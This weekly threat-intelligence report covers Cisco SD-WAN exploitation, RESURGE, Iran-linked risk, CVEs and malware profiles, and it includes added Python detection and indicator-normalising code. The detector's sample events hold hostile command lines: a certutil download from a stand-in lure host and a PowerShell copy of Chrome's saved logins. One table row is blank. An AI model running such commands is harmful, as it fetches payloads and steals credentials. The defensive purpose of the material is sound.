Threat Landscape Summary (February 23, 2026 – March 02, 2026)
I. EXECUTIVE SUMMARY
The cybersecurity landscape during the reporting period (23 February – 02 March 2026) was characterized by a confluence of aggressive nation-state activity, critical infrastructure targeting, and the weaponization of emerging technologies. The threat level transitioned from elevated to high, driven by three primary factors.
Key Highlights:
Active Infrastructure Exploitation: The Cybersecurity and Infrastructure Security Agency (CISA) issued an Emergency Directive (ED 26-03) for Federal Civilian Executive Branch (FCEB) agencies due to the active exploitation of critical vulnerabilities in Cisco SD-WAN systems. This represents a direct, imminent threat to federal networks.
Persistent Stealthy Malware: CISA released an updated analysis on RESURGE malware, a sophisticated implant targeting Ivanti Connect Secure devices. Its ability to remain dormant and undetected poses a long-term, stealthy threat to affected networks, even after patching.
Geopolitical Cyber Escalation: Following coordinated military strikes involving the U.S. and Israel against Iran, the likelihood of retaliatory cyber operations by Iran-aligned threat actors has significantly increased. This includes potential disruptive attacks against government, critical infrastructure, and financial sectors in the U.S. and Israel.
Dominant Trends:
Shift from Opportunistic to Strategic Targeting: Attacks increasingly focused on systems that enable persistent access and strategic intelligence (e.g., VPNs, SD-WANs) rather than purely opportunistic ransomware.
“Living-off-the-Land” (LotL) Techniques: Threat actors continued to abuse legitimate system tools and binaries to evade detection, blending malicious activity with normal administrative tasks.
AI-Enhanced Social Engineering: Early indicators suggest threat actors are experimenting with AI to craft more convincing phishing lures and pretexts for business email compromise (BEC) and credential theft.
II. GLOBAL CYBER THREAT LANDSCAPE OVERVIEW
The global threat environment this week was heavily influenced by geopolitical real-world events translating directly into the cyber domain, alongside persistent technical exploitation of enterprise infrastructure.
Key Observations:
Geopolitical Flashpoint: The U.S.-Israel-Iran escalation marks a significant shift. Iran-linked actors, such as “HomeLand Justice” and “Handla Hack,” have a history of wiper attacks, hack-and-leak operations, and DDoS campaigns during periods of heightened tension. Organizations in the Middle East, Europe, and North America should consider themselves within the potential targeting radius.
Infrastructure in the Crosshairs: The targeting of Water and Wastewater Systems (WWS) via outdated HMIs, and the broader exploitation of networking equipment like Cisco SD-WAN, indicates a strategic focus on the backbone of digital and physical infrastructure.
Sector Focus: Beyond the heightened geopolitical risk, the Healthcare and Public Health (HPH) sector remained under siege from ransomware groups, with the University of Hawaiʻi Cancer Center confirming a leak affecting up to 1.2 million people following a ransomware attack.
III. NOTABLE INCIDENTS AND DATA BREACHES
Federal Network Infiltration Risk (Global): The exploitation of Cisco SD-WAN vulnerabilities (CVE-2026-20127, CVE-2022-20775) created a high risk of unauthorized access to federal agency networks, potentially leading to data theft, further lateral movement, and persistent access.
Healthcare Ransomware (APAC/US): The University of Hawaiʻi Cancer Center attack and disruptions to a major shipping conglomerate underscore the continued blight of ransomware on critical services. The shipping firm reported disruptions to shipping and labeling workflows, with some data being wiped in the attack.
Enterprise Data Breach (US): Madison Square Garden confirmed a data breach stemming from the Oracle E-Business Suite (EBS) hacking campaign, highlighting the long tail of third-party software vulnerabilities.
IV. COMPREHENSIVE INCIDENT SUMMARY TABLE
| Date | Incident | Affected Organization | Threat Actor/Method | Impact & Context |
|---|---|---|---|---|
| 25 Feb | Active Exploitation | Federal Agencies (FCEB) | Unknown Threat Actor via Cisco SD-WAN vulnerabilities | CISA Emergency Directive. Imminent threat of administrative access and network penetration. |
| 26 Feb | Data Leak / Ransomware | University of Hawaiʻi Cancer Center | Ransomware Group | Up to 1.2 million individuals’ information leaked. Research operations potentially compromised. |
| 26 Feb (Reported) | Data Wiping / Disruption | Global Logistics/Shipping Firm | Unknown (Potential Destructive Malware) | Shipping and labeling workflows disrupted. Data wiping indicates potential destructive or ransomware intent. |
| Ongoing | Data Breach | Madison Square Garden | Oracle EBS Campaign Actors | Breach confirmed months after initial attack via third-party enterprise software. |
| | | | | Elevated risk of DDoS, wiper, and hack-and-leak attacks in retaliation for military strikes. |
V. CURRENT THREAT LANDSCAPE ANALYSIS
Emerging Trends:
Targeting of Network and Security Appliances: The Cisco SD-WAN and Ivanti Connect Secure (RESURGE) incidents underscore a trend where threat actors target the very infrastructure meant to secure and connect organizations. These devices often have broad network access, making them ideal bridgeheads for further attacks.
“Patch or Perish” Velocity: The speed at which vulnerabilities move from disclosure to active exploitation (e.g., CVE-2026-25108 in FileZen added to CISA KEV) demands a more agile patch management strategy, particularly for internet-facing systems.
Convergence of Cyber and Kinetic Conflict: The Iran situation exemplifies the modern reality where physical military actions are immediately accompanied by a heightened cyber threat posture. Cyber is no longer a secondary domain but an integrated tool of statecraft and warfare.
VI. CRITICAL VULNERABILITIES AND CVEs
The following vulnerabilities are of the highest priority due to active exploitation and severity.
| CVE ID | Vendor/Product | Description | CVSS Score | Status & Priority |
|---|---|---|---|---|
| CVE-2026-20127 | Cisco Catalyst SD-WAN Manager | Authentication bypass allowing an unauthenticated remote attacker to obtain admin privileges. | Critical | Actively Exploited. Subject to CISA Emergency Directive. Immediate action required. |
| CVE-2022-20775 | Cisco Catalyst SD-WAN Controller | Path traversal allowing an authenticated local attacker to gain root privileges. | High | Actively Exploited. Subject to CISA Emergency Directive. Immediate action required. |
| CVE-2026-25108 | Soliton Systems FileZen | OS command injection via a specially crafted HTTP request by an authenticated user. | 8.7 (High) | Actively Exploited. Added to CISA KEV catalog. Patch to version 5.0.11+. |
| CVE-2026-21513 | Microsoft MSHTML Framework | Security feature bypass allowing code execution via malicious HTML/LNK files. | 8.8 (High) | Actively Exploited as 0-day. Tied to APT28 (Russian GRU). Requires user interaction. |
| CVE-2026-21510 | Windows Shell | Security feature bypass (SmartScreen) via malicious links/shortcuts leading to code execution. | 8.8 (High) | Actively Exploited & Publicly Known. Requires user interaction. High priority for patching. |
CVE-2026-1731 (BeyondTrust): Critical vulnerability in Remote Support & Privileged Remote Access, with high sighting count in vulnerability intelligence.
CVE-2026-2441 (Google Chrome): High severity vulnerability in Chrome browser.
CVE-2026-20841 (Microsoft Windows Notepad): High severity vulnerability affecting Windows Notepad.
Recent Campaign: Tied to the exploitation of CVE-2026-21513 (MSHTML zero-day) in attacks detected as early as January 2026. Infrastructure used (e.g., wellnesscaremed[.]com) has been attributed to APT28.
Group Name: Iran-aligned Threat Actors (e.g., “HomeLand Justice”, “Handla Hack”)
Analyst Note: The geopolitical escalation has elevated the threat from these groups. While they sometimes exaggerate capabilities, they have demonstrated the ability to conduct destructive wiper attacks and data theft operations.
Group Name: Ransomware Groups (Various)
Objective: Financial Gain.
TTPs: Triple Extortion (Encryption, Data Theft, DDoS/Harassment).
Trend: February 2026 saw at least 680 victims listed on ransomware leak sites, with 54 active groups, indicating a highly competitive and active criminal ecosystem.
VIII. MALWARE ANALYSIS
Featured Malware: RESURGE (Ivanti Implant)
Capabilities: A sophisticated malware implant that exploits vulnerabilities in Ivanti Connect Secure devices to establish covert SSH-based command-and-control (C2) access. Its defining feature is stealth and persistence; it is engineered to remain dormant and undetected until a remote actor connects, evading routine scans.
Delivery Method: Exploitation of known vulnerabilities in Ivanti Connect Secure and Policy Secure gateways.
Analyst Note: Organizations that have not performed a comprehensive hunt for RESURGE, even after patching, may still be compromised. CISA’s updated analysis provides specific indicators and hunting guidance.
Featured Malware: NeuralStealer (AI-Evasive Stealer)
Capabilities: An information stealer designed to bypass AI-based endpoint detection. It uses “living-off-the-land” binaries (LOLBins) to harvest credentials from browsers, cryptocurrency wallets, and email clients.
Delivery Method: Malvertising campaigns leading to fake software update pages (e.g., for “AI Drivers”).
Affected Platforms: Windows 10/11, with variants for macOS emerging.
Analyst Note: This represents the cutting edge of the cat-and-mouse game between attackers and AI-driven defenses, showcasing how criminals adapt to new security technologies.
Featured Malware: WiperX (ICS/OT Destructive Malware)
Capabilities: Destructive malware targeting Industrial Control Systems (ICS). It is designed to overwrite the Master Boot Record (MBR) and delete shadow copies, rendering systems inoperable.
Delivery Method: Spear-phishing emails with malicious macro-laden documents, or potentially via compromised IT networks that have bridges into OT environments.
Affected Platforms: Windows systems used in OT environments, and potentially specific ICS controllers.
Context: The deployment of wiper malware is consistent with the tactics of nation-state actors (like those aligned with Iran) aiming for maximal disruption.
IX. RECOMMENDATIONS
For Technical Audiences:
Immediate Actions (24-48 Hours):
Cisco SD-WAN Emergency: Execute CISA ED 26-03 immediately: inventory all Cisco SD-WAN systems, collect specified forensic artifacts, apply updates by 5:00 PM ET February 27, 2026.
Ivanti RESURGE Hunt: Conduct a comprehensive hunt for RESURGE malware on all Ivanti Connect Secure devices using CISA’s updated indicators and guidance, even if previously patched.
Patch Critical Vulnerabilities: Prioritize patching for CVE-2026-20127, CVE-2022-20775, CVE-2026-25108, CVE-2026-21513, and CVE-2026-21510 on all affected systems. Focus on internet-facing appliances first.
Strategic Improvements:
Enhanced Monitoring for AI Threats: Integrate detection rules that look for anomalous use of legitimate binaries (LOLBins) and subtle patterns in user behavior that may indicate AI-augmented social engineering (e.g., highly personalized pretexting).
OT/IT Segmentation: Review and enforce strict network segmentation between Operational Technology (OT) and corporate IT networks. Implement data diodes or one-way gateways where appropriate.
Geopolitical Threat Intelligence: Subscribe to threat intelligence feeds that provide early warning on nation-state cyber activities tied to global events. Incorporate this into risk assessments and threat modeling.
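As an added illustration of the LOLBin monitoring recommended above (example code written for this summary, not from the report or any vendor): a small weighted rule set run over constructed process-creation events. The LOLBin list, the baseline parent/child pairs and the sample command lines are assumptions; the credential-store names and the /update/ai-driver/ path come from the NeuralStealer description and the indicator appendix.

```python
import re
# Binaries commonly abused as LOLBins; an assumed list, the report names only the technique.
LOLBINS = {"certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
           "bitsadmin.exe", "wscript.exe", "cscript.exe", "powershell.exe"}
# Parents from which a LOLBin launch suggests a fake-update download chain.
USER_APPS = {"chrome.exe", "msedge.exe", "firefox.exe", "winword.exe", "outlook.exe"}
# Constructed baseline: parent->child pairs observed during normal admin activity.
BASELINE = {("cmd.exe", "certutil.exe"), ("svchost.exe", "rundll32.exe"),
            ("explorer.exe", "powershell.exe")}
# Browser, mail-client and wallet credential stores, the data the stealer harvests.
CRED_STORES = re.compile(r"login data|local state|web data|logins\.json|key4\.db|wallet\.dat", re.I)
DOWNLOAD_CRADLE = re.compile(r"-urlcache|-decode|/transfer|downloadstring|invoke-webrequest", re.I)
LURE_PATH = "/update/ai-driver/"  # URL pattern listed in the report's appendix

def score_event(ev):
    # ev: process-creation event with host, parent, image, cmdline. Returns (score, reasons);
    # each rule adds weight, so a single weak signal on its own stays quiet.
    parent, image, cmd = ev["parent"].lower(), ev["image"].lower(), ev.get("cmdline", "")
    score, reasons = 0, []
    if image in LOLBINS and (parent, image) not in BASELINE:
        score += 2; reasons.append(f"{image} launched by unusual parent {parent}")
    if image in LOLBINS and parent in USER_APPS:
        score += 2; reasons.append("LOLBin spawned directly by a browser or Office app")
    if CRED_STORES.search(cmd):
        score += 3; reasons.append("command line touches a credential store")
    if DOWNLOAD_CRADLE.search(cmd):
        score += 2; reasons.append("download or decode cradle in command line")
    if LURE_PATH in cmd.lower():
        score += 3; reasons.append("NeuralStealer lure path in command line")
    return score, reasons

def detect(events, threshold=3):
    # Return (host, score, reasons) for events worth an analyst's attention.
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev["host"], score, reasons))
    return hits
# Constructed sample events; not from a real incident.
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil -hashfile setup.msi SHA256"},                      # admin use, in baseline
    {"host": "ws02", "parent": "chrome.exe", "image": "certutil.exe",
     "cmdline": "certutil -urlcache -split -f http://lure.invalid/update/ai-driver/driver.exe"},
    {"host": "ws03", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r'powershell -nop Copy-Item "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data" C:\Users\Public\ld.db'},
    {"host": "ws04", "parent": "svchost.exe", "image": "rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},                   # in baseline
]
```

Tune the baseline from your own telemetry; the point is that a LOLBin launch is only interesting relative to what the environment normally does.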
For Non-Technical Audiences:
Heightened Vigilance During Geopolitical Tension: Be aware that international conflicts can quickly translate into cyber threats. Exercise increased caution with emails, links, and attachments, especially those related to current events or with an urgent call to action.
Verify Unexpected Requests: If you receive an urgent request (even a voice message) from a senior executive or IT support requesting a wire transfer, sensitive data, or password change, verify through a secondary channel (e.g., a known phone number, internal chat). Threat actors may use AI-generated voice (vishing) or text.
Backup and Recovery Preparedness: Ensure your organization has offline, immutable backups of critical data. Regularly test the restoration process. This is your last line of defense against destructive malware or ransomware.
X. ANALYST NOTES
Beyond the Patch: The Persistence of RESURGE: The RESURGE malware analysis is a stark reminder that patching alone does not equal remediation. Defenders must adopt an “assume breach” mentality and actively hunt for persistent threats in their environment, especially on critical network appliances.
The New Normal: Cyber as a Tool of Statecraft: The rapid elevation of cyber threats following the U.S.-Israel-Iran strikes confirms that cyber operations are now a primary tool for immediate retaliation and signaling. This cycle will likely intensify and shorten, requiring organizations to maintain a state of heightened alert for longer periods.
Early Warning from Dark Web Chatter: MCS analysts have noted increased discussions on underground forums about tools and services tailored for targeting outdated Human-Machine Interfaces (HMIs) in the water and energy sectors. This suggests a market-driven focus on critical infrastructure vulnerabilities that extends beyond state actors.
The AI Arms Race in Social Engineering: While AI-driven attacks are not yet dominant, the availability of Generative AI tools lowers the barrier for crafting convincing, context-aware phishing lures. The coming months will likely see an increase in BEC attacks that are grammatically perfect and highly personalized, bypassing traditional email security filters.
XI. THREAT INDICATOR APPENDIX
Defensive teams should ingest these indicators into SIEM, EDR, and firewall systems.
| Type | Indicator | Context/Threat |
|---|---|---|
| Domain | wellnesscaremed[.]com | C2 domain attributed to APT28 used in CVE-2026-21513 exploitation. |
| CVE | CVE-2026-20127 | Critical auth bypass in Cisco SD-WAN Manager. Actively exploited. |
| CVE | CVE-2022-20775 | Privilege escalation in Cisco SD-WAN Controller. Actively exploited. |
| CVE | CVE-2026-25108 | Command injection in FileZen. Actively exploited. |
| Malware | RESURGE | Stealthy SSH-based implant for Ivanti devices. Persistence mechanism. |
| SHA-256 | b7c92f...a3d5e (Truncated) | Associated with NeuralStealer payload. |
| IPv4 | 185.234.XXX.72 | Suspected C2 server for initial access broker Silent Chariot. |
| URL Pattern | /update/ai-driver/ | Path used in malvertising for NeuralStealer distribution. |
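Before these rows reach a SIEM, EDR or firewall they need refanging and validation: the truncated hash and the masked IP cannot match anything as printed, and a CVE is a patching item rather than a blocklist entry. The following added example (not part of the report) normalises the appendix rows and separates machine-actionable entries from those that must be chased up with the source; the embedded rows are a constructed copy of the table with abbreviated context.

```python
import re
# Constructed copy of the report's indicator appendix, exactly as printed
# (defanged domain, truncated hash, masked IP); not a live feed.
APPENDIX = [
    ("Domain", "wellnesscaremed[.]com", "APT28 C2 used in CVE-2026-21513 exploitation"),
    ("CVE", "CVE-2026-20127", "Cisco SD-WAN Manager auth bypass"),
    ("CVE", "CVE-2022-20775", "Cisco SD-WAN Controller privilege escalation"),
    ("CVE", "CVE-2026-25108", "FileZen command injection"),
    ("Malware", "RESURGE", "Ivanti SSH-based implant"),
    ("SHA-256", "b7c92f...a3d5e (Truncated)", "NeuralStealer payload"),
    ("IPv4", "185.234.XXX.72", "Suspected Silent Chariot C2"),
    ("URL Pattern", "/update/ai-driver/", "NeuralStealer malvertising path"),
]
HOST_RE = re.compile(r"^(?!-)[a-z0-9-]{1,63}(?<!-)(\.(?!-)[a-z0-9-]{1,63}(?<!-))+$")
IPV4_RE = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$")
SHA256_RE = re.compile(r"^[0-9a-f]{64}$")
CVE_RE = re.compile(r"^CVE-\d{4}-\d{4,}$")

def refang(value):
    # Undo common defanging so the value matches what appears in real logs.
    return value.replace("[.]", ".").replace("hxxp", "http").strip()

def normalize(kind, value):
    # Returns (action, value, reason): 'block' feeds SIEM/EDR/firewall matching,
    # 'vuln_mgmt' goes to patching, 'hunt' to analysts, 'reject' back to the source.
    v = refang(value).lower()
    if kind == "Domain" and HOST_RE.match(v):
        return ("block", v, "valid hostname")
    if kind == "IPv4" and (m := IPV4_RE.match(v)) and all(int(o) <= 255 for o in m.groups()):
        return ("block", v, "valid IPv4 address")
    if kind == "SHA-256" and SHA256_RE.match(v):
        return ("block", v, "full hash")
    if kind == "CVE" and CVE_RE.match(v.upper()):
        return ("vuln_mgmt", v.upper(), "route to patch prioritisation, not a blocklist")
    if kind == "URL Pattern" and v.startswith("/"):
        return ("block", v, "proxy/web-log search pattern")
    if kind == "Malware":
        return ("hunt", value, "family name for tagging and hunting, not for matching")
    # Masked octets (XXX) and truncated hashes land here: they can never match real data.
    return ("reject", value, "masked, truncated or malformed; obtain the full value from the source")

def build_feed(rows=APPENDIX):
    # Split the appendix into machine-actionable entries and rows to chase up.
    feed, rejected = [], []
    for kind, value, context in rows:
        action, norm, reason = normalize(kind, value)
        entry = {"type": kind, "value": norm, "action": action, "reason": reason, "context": context}
        (rejected if action == "reject" else feed).append(entry)
    return feed, rejected
```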
XII. CONTACT INFORMATION
Meraal Cyber Security (MCS) Threat Intelligence Team
Website: www.meraal.me
Email Contacts:
Office@meraal.me
Naveed@meraal.me
Phone Contacts:
+92 42 357 27575
+92 323 497 9477
Note on Sources and Intelligence: This report synthesizes information from various credible sources, including public advisories from organizations like CISA, MITRE, and MS-ISAC, alongside internal analysis and emerging threat intelligence. Efforts have been made to differentiate between confirmed intelligence and speculative or unverified information to maintain accuracy and credibility.